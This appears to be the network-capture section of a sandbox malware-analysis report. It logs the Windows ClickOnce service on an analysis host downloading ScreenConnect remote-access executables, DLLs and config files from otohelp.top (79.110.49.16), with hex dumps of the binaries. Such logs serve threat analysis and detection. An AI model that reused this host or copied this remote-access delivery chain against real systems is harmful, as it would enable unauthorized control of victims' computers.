2024-10-02 04:22:55 UTC	16168	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4c e0 0e b8 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 ba 00 00 00 0a 00 00 00 00 00 00 06 d8 00 00 00 20 00 00 00 e0 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 01 00 00 02 00 00 33 5d 01 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELL"0 @ 3]@
2024-10-02 04:22:56 UTC	16384	IN	Data Raw: 16 00 01 00 93 0e 06 00 de 10 22 0a 06 00 60 10 22 0a 06 00 42 26 7b 0e 06 00 e9 1d 68 0e 06 00 31 0f 46 00 06 00 f3 1a 9d 0e 06 00 53 1f a1 0e 06 00 79 27 a6 0e 06 00 84 18 22 0a 36 00 6d 08 aa 0e 16 00 9b 00 af 0e 16 00 b4 00 af 0e 16 00 29 03 af 0e 36 00 6d 08 b9 0e 16 00 37 01 af 0e 06 00 bf 1c be 0e 16 00 a8 1a c3 0e 36 00 6d 08 d0 0e 16 00 25 00 d5 0e 16 00 36 19 87 0e 36 00 6d 08 e7 0e 16 00 ff 07 ec 0e 16 00 36 08 f7 0e 06 00 0f 2f 01 0f 06 00 51 20 57 0e 06 00 c6 19 06 0f 06 00 d8 19 06 0f 06 00 70 19 0b 0f 16 00 a8 1a c3 0e 36 00 6d 08 10 0f 16 00 e7 00 15 0f 16 00 46 03 1e 0f 16 00 d4 05 29 0f 16 00 c1 06 34 0f 16 00 6b 07 34 0f 16 00 73 03 49 0f 16 00 83 01 54 0f 16 00 d5 03 5f 0f 36 00 6d 08 cb 0a 16 00 be 01 c2 0a 16 00 f9 03 c2 0a 16 00 19 Data Ascii: "`"B&{h1FSy'"6m)6m76m%66m6/Q Wp6mF)4k4sIT_6m
2024-10-02 04:22:56 UTC	16384	IN	Data Raw: 54 68 72 65 73 68 6f 6c 64 4c 61 62 65 6c 00 53 79 73 74 65 6d 2e 43 6f 6d 70 6f 6e 65 6e 74 4d 6f 64 65 6c 00 61 64 64 5f 4d 6f 75 73 65 57 68 65 65 6c 00 50 6f 70 75 6c 61 74 65 50 61 6e 65 6c 00 65 6d 70 74 79 52 65 73 75 6c 74 73 50 61 6e 65 6c 00 72 65 73 75 6c 74 73 50 61 6e 65 6c 00 70 61 6e 65 6c 00 53 65 6c 65 63 74 41 6c 6c 00 53 63 72 65 65 6e 43 6f 6e 6e 65 63 74 2e 57 69 6e 64 6f 77 73 42 61 63 6b 73 74 61 67 65 53 68 65 6c 6c 00 73 65 74 5f 41 75 74 6f 53 63 72 6f 6c 6c 00 41 73 73 65 72 74 4e 6f 6e 4e 75 6c 6c 00 67 65 74 5f 43 6f 6e 74 72 6f 6c 00 53 63 72 6f 6c 6c 61 62 6c 65 43 6f 6e 74 72 6f 6c 00 63 6f 6e 74 72 6f 6c 00 67 65 74 5f 4c 50 61 72 61 6d 00 67 65 74 5f 57 50 61 72 61 6d 00 50 72 6f 67 72 61 6d 00 67 65 74 5f 49 74 65 6d 00 Data Ascii: ThresholdLabelSystem.ComponentModeladd_MouseWheelPopulatePanelemptyResultsPanelresultsPanelpanelSelectAllScreenConnect.WindowsBackstageShellset_AutoScrollAssertNonNullget_ControlScrollableControlcontrolget_LParamget_WParamProgramget_Item
2024-10-02 04:22:56 UTC	12280	IN	Data Raw: 43 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 2e 00 57 00 69 00 6e 00 64 00 6f 00 77 00 73 00 42 00 61 00 63 00 6b 00 73 00 74 00 61 00 67 00 65 00 53 00 68 00 65 00 6c 00 6c 00 2e 00 65 00 78 00 65 00 00 00 3c 00 0e 00 01 00 50 00 72 00 6f 00 64 00 75 00 63 00 74 00 4e 00 61 00 6d 00 65 00 00 00 00 00 53 00 63 00 72 00 65 00 65 00 6e 00 43 00 6f 00 6e 00 6e 00 65 00 63 00 74 00 00 00 3e 00 0d 00 01 00 50 00 72 00 6f 00 64 00 75 00 63 00 74 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 00 00 32 00 34 00 2e 00 32 00 2e 00 31 00 30 00 2e 00 38 00 39 00 39 00 31 00 00 00 00 00 42 00 0d 00 01 00 41 00 73 00 73 00 65 00 6d 00 62 00 6c 00 79 00 20 00 56 00 65 00 72 00 73 00 69 00 6f 00 6e 00 00 00 32 00 34 00 2e 00 32 00 2e 00 31 00 30 00 2e 00 38 00 39 00 39 00 31 Data Ascii: Connect.WindowsBackstageShell.exe<ProductNameScreenConnect>ProductVersion24.2.10.8991BAssembly Version24.2.10.8991

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49751	79.110.49.16	443	5812	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:22:56 UTC	107	OUT	GET /Bin/ScreenConnect.WindowsFileManager.exe.config HTTP/1.1 Host: otohelp.top Accept-Encoding: gzip
2024-10-02 04:22:57 UTC	214	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 266 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0 Date: Wed, 02 Oct 2024 04:22:56 GMT Connection: close
2024-10-02 04:22:57 UTC	266	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49752	79.110.49.16	443	5812	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:22:57 UTC	102	OUT	GET /Bin/ScreenConnect.WindowsClient.exe.config HTTP/1.1 Host: otohelp.top Accept-Encoding: gzip
2024-10-02 04:22:57 UTC	214	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 266 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0 Date: Wed, 02 Oct 2024 04:22:56 GMT Connection: close
2024-10-02 04:22:57 UTC	266	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49754	79.110.49.16	443	5812	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:22:58 UTC	110	OUT	GET /Bin/ScreenConnect.WindowsBackstageShell.exe.config HTTP/1.1 Host: otohelp.top Accept-Encoding: gzip
2024-10-02 04:22:59 UTC	214	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 266 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0 Date: Wed, 02 Oct 2024 04:22:58 GMT Connection: close
2024-10-02 04:22:59 UTC	266	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 3e 0d 0a 20 20 3c 73 74 61 72 74 75 70 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 34 2e 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 73 75 70 70 6f 72 74 65 64 52 75 6e 74 69 6d 65 20 76 65 72 73 69 6f 6e 3d 22 76 32 2e 30 2e 35 30 37 32 37 22 20 2f 3e 0d 0a 20 20 3c 2f 73 74 61 72 74 75 70 3e 0d 0a 20 20 3c 72 75 6e 74 69 6d 65 3e 0d 0a 20 20 20 20 3c 67 65 6e 65 72 61 74 65 50 75 62 6c 69 73 68 65 72 45 76 69 64 65 6e 63 65 20 65 6e 61 62 6c 65 64 3d 22 66 61 6c 73 65 22 20 2f 3e 0d 0a 20 20 3c 2f 72 75 6e 74 69 6d 65 3e 0d 0a 3c 2f 63 6f 6e Data Ascii: <?xml version="1.0" encoding="utf-8"?><configuration> <startup> <supportedRuntime version="v4.0" /> <supportedRuntime version="v2.0.50727" /> </startup> <runtime> <generatePublisherEvidence enabled="false" /> </runtime></con

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49756	79.110.49.16	443	5812	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:22:59 UTC	100	OUT	GET /Bin/ScreenConnect.WindowsFileManager.exe HTTP/1.1 Host: otohelp.top Accept-Encoding: gzip
2024-10-02 04:22:59 UTC	216	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 81696 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0 Date: Wed, 02 Oct 2024 04:22:58 GMT Connection: close
2024-10-02 04:22:59 UTC	16168	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 50 da a7 bb 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 40 00 00 00 d4 00 00 00 00 00 00 e6 5e 00 00 00 20 00 00 00 60 00 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 01 00 00 02 00 00 6a 8b 01 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELP"0@^ `@ `j@
2024-10-02 04:23:00 UTC	16384	IN	Data Raw: 2d 34 35 32 62 2d 38 39 37 35 2d 37 34 61 38 35 38 32 38 64 33 35 34 00 00 13 01 00 02 00 00 00 04 54 65 78 74 05 53 74 61 74 65 00 00 08 01 00 0b 00 00 00 00 00 00 00 d2 59 fd a1 c3 db f8 b2 a8 38 41 41 b5 70 2f b9 70 e0 44 04 4a 6f 16 7f 54 f3 2d 91 6d bf ac 66 21 46 ef be d1 1e 85 dd 2b 75 b8 ff 7a 0d c8 39 d0 7b 2a 86 54 8d 79 d9 5d b2 8a 3c 12 a6 c1 3c 94 5c c5 c2 54 9b e5 b0 38 01 34 d6 47 4a 0b 62 7d 82 0a bc 8e 63 9f ae dc 13 7e 39 98 c7 b5 f2 fd 11 5b 4c 23 82 a4 fd 40 df 22 18 d8 3f 0b 56 59 b3 b5 88 4c 17 d4 e9 59 bc f3 d5 72 d6 78 1b 00 00 00 00 81 c5 e8 85 00 00 00 00 02 00 00 00 7b 00 00 00 18 5e 00 00 18 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 52 53 44 53 cb 4c a1 5b 4d 39 69 48 9a 46 34 Data Ascii: -452b-8975-74a85828d354TextStateY8AAp/pDJoT-mf!F+uz9{*Ty]<<\T84GJb}c~9[L#@"?VYLYrx{^@RSDSL[M9iHF4
2024-10-02 04:23:00 UTC	16384	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 d2 ff ff 55 d1 fe ff 54 d0 fd ff 53 cf fb ff 52 cc f8 ff 51 c9 f4 ff 50 c6 f0 ff 4e c2 eb ff 4c bc e5 ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff dd 96 3a ff 4c bc e5 ff 4e c2 eb ff 50 c6 f0 ff 51 c9 f4 ff 52 cc f8 ff 53 ce fa ff 54 d0 fd ff 55 d1 fe ff 55 d2 ff Data Ascii: UUTSRQPNL::::::::::::::::::::::::::::::::::::::LNPQRSTUU
2024-10-02 04:23:00 UTC	16384	IN	Data Raw: 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 66 d7 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 67 d8 ff ff 00 00 00 Data Ascii: fffffffffffffffgggggggggggggggggggggggggggggggggggggggggg
2024-10-02 04:23:00 UTC	16376	IN	Data Raw: 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 00 9a dc ff 6e cd f3 ff 85 e0 ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 80 df ff ff 9a e5 ff ef 00 00 00 00 00 00 00 00 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 cf 00 9f e0 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9f e0 ef 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 ff 00 9f e0 cf 00 9f e0 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: n

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49757	79.110.49.16	443	5812	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-02 04:23:00 UTC	88	OUT	GET /Bin/ScreenConnect.Client.dll HTTP/1.1 Host: otohelp.top Accept-Encoding: gzip
2024-10-02 04:23:01 UTC	217	IN	HTTP/1.1 200 OK Cache-Control: private Content-Length: 197120 Content-Type: text/html Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0 Date: Wed, 02 Oct 2024 04:23:00 GMT Connection: close
2024-10-02 04:23:01 UTC	16167	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5a 3c cd b8 00 00 00 00 00 00 00 00 e0 00 22 20 0b 01 30 00 00 fa 02 00 00 06 00 00 00 00 00 00 82 18 03 00 00 20 00 00 00 20 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 03 00 00 02 00 00 9e 14 03 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELZ<" 0 `@
2024-10-02 04:23:01 UTC	16384	IN	Data Raw: 00 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02 06 28 f6 02 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26 06 6f 29 00 00 0a 2a 0a 16 2a 2e 02 03 28 f8 02 00 06 16 fe 01 2a 26 0f 00 03 28 fb 02 00 06 2a 0a 16 2a 5e 03 75 77 00 00 02 2c 0d 02 03 a5 77 00 00 02 28 fb 02 00 06 2a 16 2a 0a 17 2a 00 13 30 02 00 40 00 00 00 0c 00 00 11 73 75 00 00 0a 0a 06 72 c3 0f 00 70 6f 76 00 00 0a 26 06 72 59 01 00 70 6f 76 00 00 0a 26 02 06 28 fd 02 00 06 2c 09 06 1f 20 6f 77 00 00 0a 26 06 1f 7d 6f 77 00 00 0a 26 06 6f 29 00 00 0a 2a 0a 16 2a 2e 02 03 28 ff 02 00 06 16 fe 01 2a 26 0f 00 03 28 02 03 00 06 2a 0a 16 2a 5e 03 75 78 00 00 02 2c 0d 02 03 a5 78 00 00 02 28 02 03 00 06 2a 16 2a 0a 17 2a 00 13 30 02 00 40 00 00 00 0c 00 00 11 73 75 00 00 0a 0a Data Ascii: &rYpov&(, ow&}ow&o)*.(&(^uw,w(0@surpov&rYpov&(, ow&}ow&o).(&(^ux,x(*0@su
2024-10-02 04:23:01 UTC	16384	IN	Data Raw: 04 02 7e 2c 02 00 0a 7d 06 01 00 04 02 15 7d 07 01 00 04 02 28 ef 00 00 0a 6f 2f 02 00 0a 7d 04 01 00 04 02 7b 04 01 00 04 03 06 7b 6b 01 00 04 6f 30 02 00 0a 06 7b 6b 01 00 04 6f 31 02 00 0a 6f 32 02 00 0a 02 7b 04 01 00 04 05 0e 04 6f 33 02 00 0a 02 7b 04 01 00 04 16 16 06 7b 6b 01 00 04 6f 30 02 00 0a 06 7b 6b 01 00 04 6f 31 02 00 0a 73 95 01 00 0a 06 fe 06 b5 04 00 06 73 34 02 00 0a 28 35 02 00 0a de 10 26 02 28 14 04 00 06 fe 1a 07 28 bd 00 00 0a dc 2a 00 00 00 01 1c 00 00 00 00 66 00 76 dc 00 09 16 00 00 01 02 00 1a 00 cb e5 00 07 00 00 00 00 1b 30 03 00 42 00 00 00 25 00 00 11 02 7b 03 01 00 04 0a 06 28 b8 00 00 0a 02 28 15 04 00 06 72 cb 17 00 70 18 28 36 02 00 0a 26 02 17 28 1e 04 00 06 de 19 02 7b 04 01 00 04 6f 37 02 00 0a 02 28 14 04 00 06 dc Data Ascii: ~,}}(o/}{{ko0{ko1o2{o3{{ko0{ko1ss4(5&((*fv0B%{((rp(6&({o7(
2024-10-02 04:23:01 UTC	16384	IN	Data Raw: 01 47 1f 16 00 f6 03 58 1f 16 00 30 07 69 1f 16 00 ab 08 47 1f 16 00 30 04 71 1f 16 00 4d 07 7b 1f 16 00 01 00 85 1f 16 00 3b 03 85 1f 06 00 ce 72 8e 1f 06 00 69 5c 9d 1d 06 00 ce 72 8e 1f 06 00 a5 75 8e 1d 01 00 e3 74 93 1f 01 00 e5 59 a9 10 01 00 50 37 99 1f 36 00 56 0a 9e 1f 16 00 8a 02 a3 1f 36 00 56 0a af 1f 16 00 a0 00 a3 1f 36 00 56 0a e6 11 16 00 70 00 dc 11 16 00 94 03 52 12 06 00 12 81 64 07 06 00 06 63 b4 11 06 00 7b 6d 0f 11 06 00 ce 72 b9 11 06 00 71 32 c6 11 06 00 9c 79 cb 11 06 00 90 83 a6 10 06 00 a9 62 2c 13 06 00 ce 72 b9 11 06 00 19 0d 58 04 06 00 26 77 b4 1f 06 00 ce 72 b9 1f 06 00 ac 65 7a 1e 06 00 7d 5d cb 11 36 00 56 0a be 1f 16 00 6c 01 c3 1f 06 00 ce 72 d5 1f 06 00 12 81 2a 1f 06 00 1a 63 da 1f 06 00 e4 7d 74 1d 06 00 79 59 ec 1f Data Ascii: GX0iG0qM{;ri\rutYP76V6V6VpRdc{mrq2yb,rX&wrez}]6Vlr*c}tyY
2024-10-02 04:23:01 UTC	16384	IN	Data Raw: b2 00 00 00 00 c4 01 1e 2a ce 2b e8 03 8c b2 00 00 00 00 94 00 7b 3e d8 2b e9 03 00 00 00 00 00 00 c4 05 42 64 e2 2b ea 03 2f b3 00 00 00 00 81 00 bc 71 e2 2b eb 03 50 b3 00 00 00 00 c4 00 58 10 d1 21 ec 03 a0 b9 00 00 00 00 81 00 81 2a e9 2b ed 03 08 ba 00 00 00 00 91 00 00 0f f8 2b f0 03 a0 ba 00 00 00 00 81 00 6a 09 08 2c f4 03 c0 ba 00 00 00 00 91 18 97 66 aa 20 f5 03 cc ba 00 00 00 00 86 18 91 66 01 00 f5 03 d4 ba 00 00 00 00 83 00 87 01 0f 2c f5 03 f3 ba 00 00 00 00 91 18 97 66 aa 20 f6 03 ff ba 00 00 00 00 86 18 91 66 01 00 f6 03 07 bb 00 00 00 00 83 00 3a 00 20 2c f6 03 0f bb 00 00 00 00 83 00 74 03 27 2c f7 03 17 bb 00 00 00 00 83 00 a3 01 78 29 f8 03 2a bb 00 00 00 00 86 18 91 66 01 00 f9 03 32 bb 00 00 00 00 83 00 b9 02 76 07 f9 03 56 bb 00 00 Data Ascii: +{>+Bd+/q+PX!++j,f f,f f: ,t',x)*f2vV
2024-10-02 04:23:01 UTC	16384	IN	Data Raw: 1c 41 13 6b 00 a0 1c 60 13 6b 00 a0 1c 61 13 1a 00 db 2e 61 13 6b 00 a0 1c 80 13 6b 00 a0 1c a3 13 6b 00 a0 1c c3 13 6b 00 a0 1c e1 13 6b 00 a0 1c e3 13 6b 00 a0 1c 01 14 6b 00 a0 1c 03 14 6b 00 a0 1c 21 14 6b 00 a0 1c 41 14 6b 00 a0 1c 60 14 6b 00 a0 1c 61 14 6b 00 a0 1c 63 14 6b 00 a0 1c 81 14 6b 00 a0 1c 83 14 6b 00 a0 1c a0 14 6b 00 a0 1c a1 14 6b 00 a0 1c c1 14 6b 00 a0 1c c3 14 6b 00 a0 1c e1 14 6b 00 a0 1c e3 14 6b 00 a0 1c 01 15 6b 00 a0 1c 03 15 6b 00 a0 1c 21 15 6b 00 a0 1c 23 15 6b 00 a0 1c 41 15 1a 00 5c 2f 41 15 6b 00 a0 1c 44 15 c2 05 a0 1c 61 15 6b 00 a0 1c 63 15 6b 00 a0 1c 80 15 6b 00 a0 1c 81 15 6b 00 a0 1c 83 15 6b 00 a0 1c a0 15 6b 00 a0 1c a1 15 1a 00 db 2e a1 15 6b 00 a0 1c a3 15 6b 00 a0 1c c0 15 6b 00 a0 1c c1 15 6b 00 a0 1c c3 15 Data Ascii: Ak`ka.akkkkkkkk!kAk`kakckkkkkkkkkkk!k#kA\/AkDakckkkkk.kkkk
2024-10-02 04:23:01 UTC	16384	IN	Data Raw: 52 65 71 75 65 73 74 49 44 00 3c 3e 4f 00 53 79 73 74 65 6d 2e 49 4f 00 3c 73 74 72 65 61 6d 49 44 3e 50 00 43 61 6c 63 75 6c 61 74 65 46 50 53 00 54 00 67 65 74 5f 58 00 74 69 6c 65 58 00 67 65 74 5f 59 00 74 69 6c 65 59 00 76 61 6c 75 65 5f 5f 00 55 6e 69 6f 6e 55 6e 6c 65 73 73 4e 6f 41 72 65 61 00 67 65 74 5f 44 61 74 61 00 73 65 74 5f 44 61 74 61 00 73 6f 75 6e 64 44 61 74 61 00 57 72 69 74 65 4d 65 73 73 61 67 65 44 61 74 61 00 67 65 74 5f 46 72 61 6d 65 44 61 74 61 00 73 65 74 5f 46 72 61 6d 65 44 61 74 61 00 53 69 67 6e 44 61 74 61 00 67 65 74 5f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 44 61 74 61 00 73 65 74 5f 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 44 61 74 61 00 49 42 69 74 6d 61 70 44 61 74 61 00 62 69 74 6d 61 70 44 61 74 61 00 64 61 74 Data Ascii: RequestID<>OSystem.IO<streamID>PCalculateFPSTget_XtileXget_YtileYvalue__UnionUnlessNoAreaget_Dataset_DatasoundDataWriteMessageDataget_FrameDataset_FrameDataSignDataget_AuthenticationDataset_AuthenticationDataIBitmapDatabitmapDatadat
